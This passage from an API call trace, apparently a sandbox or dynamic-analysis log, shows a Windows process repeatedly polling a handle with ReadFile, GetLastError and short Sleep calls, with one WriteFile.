	[0231.567] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0231.567] GetLastError () returned 0x218
	[0231.568] Sleep (dwMilliseconds=0xa) 
	[0231.583] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0231.583] GetLastError () returned 0x218
	[0231.583] Sleep (dwMilliseconds=0xa) 
	[0231.630] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0231.630] GetLastError () returned 0x218
	[0231.630] Sleep (dwMilliseconds=0xa) 
	[0231.676] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0231.676] GetLastError () returned 0x218
	[0231.676] Sleep (dwMilliseconds=0xa) 
	[0231.723] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0231.723] GetLastError () returned 0x218
	[0231.723] Sleep (dwMilliseconds=0xa) 
	[0231.739] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0231.739] GetLastError () returned 0x218
	[0231.739] Sleep (dwMilliseconds=0xa) 
	[0231.755] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0231.756] GetLastError () returned 0x218
	[0231.756] Sleep (dwMilliseconds=0xa) 
	[0231.774] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0231.774] GetLastError () returned 0x218
	[0231.774] Sleep (dwMilliseconds=0xa) 
	[0231.785] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0231.785] GetLastError () returned 0x218
	[0231.785] Sleep (dwMilliseconds=0xa) 
	[0231.801] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0231.801] GetLastError () returned 0x218
	[0231.802] Sleep (dwMilliseconds=0xa) 
	[0231.820] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0231.821] GetLastError () returned 0x218
	[0231.821] Sleep (dwMilliseconds=0xa) 
	[0231.864] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0231.864] GetLastError () returned 0x218
	[0231.864] Sleep (dwMilliseconds=0xa) 
	[0231.934] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0231.934] GetLastError () returned 0x218
	[0231.935] Sleep (dwMilliseconds=0xa) 
	[0231.985] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0231.985] GetLastError () returned 0x218
	[0231.985] Sleep (dwMilliseconds=0xa) 
	[0231.988] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0231.989] GetLastError () returned 0x218
	[0231.989] Sleep (dwMilliseconds=0xa) 
	[0232.004] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0232.004] GetLastError () returned 0x218
	[0232.004] Sleep (dwMilliseconds=0xa) 
	[0232.019] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0232.020] GetLastError () returned 0x218
	[0232.020] Sleep (dwMilliseconds=0xa) 
	[0232.040] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0232.040] GetLastError () returned 0x218
	[0232.040] Sleep (dwMilliseconds=0xa) 
	[0232.052] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0232.052] GetLastError () returned 0x218
	[0232.052] Sleep (dwMilliseconds=0xa) 
	[0232.066] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0232.066] GetLastError () returned 0x218
	[0232.067] Sleep (dwMilliseconds=0xa) 
	[0232.082] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0232.082] GetLastError () returned 0x218
	[0232.082] Sleep (dwMilliseconds=0xa) 
	[0232.176] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0232.176] GetLastError () returned 0x218
	[0232.176] Sleep (dwMilliseconds=0xa) 
	[0232.255] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0232.255] GetLastError () returned 0x218
	[0232.255] Sleep (dwMilliseconds=0xa) 
	[0232.300] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0232.300] GetLastError () returned 0x218
	[0232.300] Sleep (dwMilliseconds=0xa) 
	[0232.316] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0232.316] GetLastError () returned 0x218
	[0232.316] Sleep (dwMilliseconds=0xa) 
	[0232.332] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0232.332] GetLastError () returned 0x218
	[0232.332] Sleep (dwMilliseconds=0xa) 
	[0232.347] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0232.347] GetLastError () returned 0x218
	[0232.347] Sleep (dwMilliseconds=0xa) 
	[0232.364] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0232.364] GetLastError () returned 0x218
	[0232.364] Sleep (dwMilliseconds=0xa) 
	[0232.379] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0232.379] GetLastError () returned 0x218
	[0232.379] Sleep (dwMilliseconds=0xa) 
	[0232.395] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0232.396] GetLastError () returned 0x218
	[0232.396] Sleep (dwMilliseconds=0xa) 
	[0232.411] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0232.412] GetLastError () returned 0x218
	[0232.412] Sleep (dwMilliseconds=0xa) 
	[0232.457] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0232.457] GetLastError () returned 0x218
	[0232.457] Sleep (dwMilliseconds=0xa) 
	[0232.503] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0232.503] GetLastError () returned 0x218
	[0232.503] Sleep (dwMilliseconds=0xa) 
	[0232.546] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0232.546] GetLastError () returned 0x218
	[0232.546] Sleep (dwMilliseconds=0xa) 
	[0232.552] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0232.552] GetLastError () returned 0x218
	[0232.552] Sleep (dwMilliseconds=0xa) 
	[0232.566] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0232.566] GetLastError () returned 0x218
	[0232.566] Sleep (dwMilliseconds=0xa) 
	[0232.582] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0232.582] GetLastError () returned 0x218
	[0232.582] Sleep (dwMilliseconds=0xa) 
	[0232.597] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0232.597] GetLastError () returned 0x218
	[0232.598] Sleep (dwMilliseconds=0xa) 
	[0232.613] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0232.613] GetLastError () returned 0x218
	[0232.613] Sleep (dwMilliseconds=0xa) 
	[0232.629] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0232.629] GetLastError () returned 0x218
	[0232.629] Sleep (dwMilliseconds=0xa) 
	[0232.644] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0232.644] GetLastError () returned 0x218
	[0232.644] Sleep (dwMilliseconds=0xa) 
	[0232.722] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0232.722] GetLastError () returned 0x218
	[0232.722] Sleep (dwMilliseconds=0xa) 
	[0232.784] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0232.784] GetLastError () returned 0x218
	[0232.784] Sleep (dwMilliseconds=0xa) 
	[0232.831] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0232.831] GetLastError () returned 0x218
	[0232.831] Sleep (dwMilliseconds=0xa) 
	[0232.846] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0232.846] GetLastError () returned 0x218
	[0232.846] Sleep (dwMilliseconds=0xa) 
	[0232.862] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0232.862] GetLastError () returned 0x218
	[0232.862] Sleep (dwMilliseconds=0xa) 
	[0232.878] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0232.878] GetLastError () returned 0x218
	[0232.878] Sleep (dwMilliseconds=0xa) 
	[0232.894] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0232.894] GetLastError () returned 0x218
	[0232.894] Sleep (dwMilliseconds=0xa) 
	[0232.909] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0232.910] GetLastError () returned 0x218
	[0232.910] Sleep (dwMilliseconds=0xa) 
	[0232.928] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0232.928] GetLastError () returned 0x218
	[0232.928] Sleep (dwMilliseconds=0xa) 
	[0232.957] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0232.957] GetLastError () returned 0x218
	[0232.957] Sleep (dwMilliseconds=0xa) 
	[0233.003] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0233.003] GetLastError () returned 0x218
	[0233.003] Sleep (dwMilliseconds=0xa) 
	[0233.049] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0233.049] GetLastError () returned 0x218
	[0233.049] Sleep (dwMilliseconds=0xa) 
	[0233.086] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0233.086] GetLastError () returned 0x218
	[0233.086] Sleep (dwMilliseconds=0xa) 
	[0233.097] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0233.097] GetLastError () returned 0x218
	[0233.097] Sleep (dwMilliseconds=0xa) 
	[0233.113] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0233.113] GetLastError () returned 0x218
	[0233.113] Sleep (dwMilliseconds=0x3e8) 
	[0234.167] WriteFile (in: hFile=0x258, lpBuffer=0x116f4dc, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x116f4d4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x116f4d4, lpOverlapped=0x0) returned 0
	[0234.167] Sleep (dwMilliseconds=0xa) 
	[0234.173] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0234.173] GetLastError () returned 0x218
	[0234.173] Sleep (dwMilliseconds=0xa) 
	[0234.192] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0234.192] GetLastError () returned 0x218
	[0234.192] Sleep (dwMilliseconds=0xa) 
	[0234.204] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0234.204] GetLastError () returned 0x218
	[0234.204] Sleep (dwMilliseconds=0xa) 
	[0234.254] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0234.254] GetLastError () returned 0x218
	[0234.254] Sleep (dwMilliseconds=0xa) 
	[0234.297] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0234.297] GetLastError () returned 0x218
	[0234.297] Sleep (dwMilliseconds=0xa) 
	[0234.344] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0234.344] GetLastError () returned 0x218
	[0234.344] Sleep (dwMilliseconds=0xa) 
	[0234.386] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0234.386] GetLastError () returned 0x218
	[0234.386] Sleep (dwMilliseconds=0xa) 
	[0234.400] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0234.400] GetLastError () returned 0x218
	[0234.400] Sleep (dwMilliseconds=0xa) 
	[0234.407] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0234.407] GetLastError () returned 0x218
	[0234.407] Sleep (dwMilliseconds=0xa) 
	[0234.423] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0234.423] GetLastError () returned 0x218
	[0234.423] Sleep (dwMilliseconds=0xa) 
	[0234.438] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0234.438] GetLastError () returned 0x218
	[0234.438] Sleep (dwMilliseconds=0xa) 
	[0234.460] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0234.460] GetLastError () returned 0x218
	[0234.460] Sleep (dwMilliseconds=0xa) 
	[0234.471] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0234.471] GetLastError () returned 0x218
	[0234.471] Sleep (dwMilliseconds=0xa) 
	[0234.488] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0234.488] GetLastError () returned 0x218
	[0234.488] Sleep (dwMilliseconds=0xa) 
	[0234.607] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0234.607] GetLastError () returned 0x218
	[0234.607] Sleep (dwMilliseconds=0xa) 
	[0234.674] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0234.674] GetLastError () returned 0x218
	[0234.674] Sleep (dwMilliseconds=0xa) 
	[0234.749] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0234.749] GetLastError () returned 0x218
	[0234.749] Sleep (dwMilliseconds=0xa) 
	[0234.777] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0234.777] GetLastError () returned 0x218
	[0234.777] Sleep (dwMilliseconds=0xa) 
	[0234.820] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0234.820] GetLastError () returned 0x218
	[0234.820] Sleep (dwMilliseconds=0xa) 
